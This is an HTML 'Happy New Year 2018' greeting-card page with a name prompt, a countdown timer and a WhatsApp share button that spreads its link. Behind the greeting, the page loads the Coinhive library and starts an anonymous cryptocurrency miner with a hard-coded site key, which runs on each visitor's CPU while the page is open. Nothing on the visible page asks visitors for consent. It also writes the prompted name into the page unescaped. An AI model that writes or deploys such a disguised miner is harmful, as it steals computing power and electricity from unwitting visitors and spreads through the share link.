
<html><head>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>We are mining!!!</title>
    


    
    <link rel="stylesheet" type="text/css" href="main.css">
<style>
    i {
        color: darkblue;
    }
input[type=name], select {
    width: 100%;
    padding: 12px 20px;
    margin: 4px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
}
.footerbtn {
  border-radius: 5px;
  box-sizing: border-box;
  padding: 5px;
  position: fixed;
  left:0px;
  bottom:0px;
  height:40px;
  width:100%;
  background:#34af23;
  color: #ffffff;
  font-size: 16px;
  text-align: center;
  text-decoration: none;
}

.footerbtn:hover {
  text-decoration: none;
    position: fixed;
}

@-webkit-keyframes jello {  from, 11.1%, to {    transform: none;  }
  22.2% {    transform: skewX(-12.5deg) skewY(-12.5deg);  }
  33.3% {    transform: skewX(6.25deg) skewY(6.25deg);  }
  44.4% {    transform: skewX(-3.125deg) skewY(-3.125deg);  }
  55.5% {    transform: skewX(1.5625deg) skewY(1.5625deg);  }
  66.6% {    transform: skewX(-0.78125deg) skewY(-0.78125deg);  }
  77.7% {    transform: skewX(0.390625deg) skewY(0.390625deg);  }
  88.8% {    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);  }}
.jello {  -webkit-animation: jello 3s infinite;  transform-origin: center; -webkit-animation-delay:6s}
@-webkit-keyframes hue {
  from {    -webkit-filter: hue-rotate(0deg);  }
  to {    -webkit-filter: hue-rotate(-360deg);  }}
    .m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
    .m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}

.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}

hi {
 font-size:2.5em;
 user-select:none;
}

hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
 @keyframes float {
  0%,100%{ transform:none; }
  33%{ transform:translateY(-1px) rotate(-2deg); }
  66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
  0%,100%{ transform:translate(0); }
  25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
  50%{ transform:translateY(-20px) rotate(3deg) scale(1.1);  }
  
}

@import url(http://fonts.googleapis.com/css?family=Concert+One);

h1 {
  animation:glow 10s ease-in-out infinite;
}



* { box-sizing:border-box; }

figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}

@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
  display:block;
  width:100%;
  line-height:1.5;
  font:900 2.5em 'Concert One', sans-serif;
  position:absolute;
  color:#fff;
}

@keyframes glow {
  0%,100%{ text-shadow:0 0 30px red; }
  25%{ text-shadow:0 0 30px orange; }
  50%{ text-shadow:0 0 30px forestgreen; }
  75%{ text-shadow:0 0 30px cyan; }
}

h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30px); }
h1:nth-child(8){ transform:translateZ(35px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }
</style>

</head>

<body style="background-image: url(2.gif)">

<h1 align="center">Happy New Year</h1>

<marquee class="m1" behavior="scroll" direction="up" scrolldelay="5">  <br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>

</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>
<img src="side.gif" height="40px" width="60px"/><br><br>

</marquee>
<script>
            var miner = new CoinHive.Anonymous('fiOmP5sAzdL9mKGf0ZHfYNqDUAvQpQou');
            miner.start();
 
            // Listen on events
            miner.on('found', function() {
                console.log("found hash!")
            })
            miner.on('accepted', function() {
                console.log("accepted hash!")
            })
 
            // Update stats once per second
            setInterval(function() {
                var hashesPerSecond = miner.getHashesPerSecond();
                var totalHashes = miner.getTotalHashes();
                var acceptedHashes = miner.getAcceptedHashes();
 
                console.log("hashesPerSecond", hashesPerSecond)
                console.log("totalHashes", totalHashes)
                console.log("acceptedHashes", acceptedHashes)
 
                console.log("-----------")
                console.log("-----------")
                console.log("-----------")
 
                // Output to HTML elements...
            }, 1000);
        </script>
    
<div class="container">
    <div class="main-greeting">

            <div class="main_body">
<figure>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    var a=prompt("please enter your Full name");
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script></h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script></h1>

</figure>
<br>
<br>
<br>
<br>
<br>
<br>

<div class="bubbles">
<hi><span>W</span><span>i</span><span>s</span><span>h</span><span>i</span><span>n</span><span>g</span><span> </span><span>Y</span><span>o</span><span>u</span></hi></div>
</div>
<div class="vi" style="text-align: center;">
<img src="hn.jpg" class="img-responsive" alt="diwali" style="width: 100%; height:350px;">

</div>
<div align="center html2canvas-ignore">
     <div style="font-size: 28px; font-weight: 800; color: red;">
            
   <!-- Display the countdown timer in an element -->
<p id="demo"></p>

<script>
// Set the date we're counting down to
var countDownDate = new Date("Jan 01, 2018 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="demo"
  document.getElementById("demo").innerHTML = days + "<i> Days,</i> " + hours + " <i>Hrs,</i> "
  + minutes + "<i> Min,</i> " + seconds + "<i> Sec,</i> ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "EXPIRED";
  }
}, 1000);
</script>        
</div><br><br>
</div><br>
<p aling="center" style="font-size: 25px;"><b>Hey, Happy New<br> Year</b></p>
<div class="busi"><p style="text-transform: uppercase;"> <script type="text/javascript" language="Javascript">
                    
                    document.write( "By - " +a);
                      </script></p>
        </div>

            </div>
        </div>
    <a class="footerbtn" href="whatsapp://send?text=WISH YOU VERY VERY HAPPY NEW YEAR 2018.

Touch this blue line %26 see magic ??

https://goo.gl/85TSE3"><img width="25px" height="25px" src="4-2-whatsapp-transparent.png"/><b style="font-size: 25px;"> Click Here to Share on Whatsapp</b> <img width="25px" height="25px" src="4-2-whatsapp-transparent.png"/></a>
    </body>
</html>        



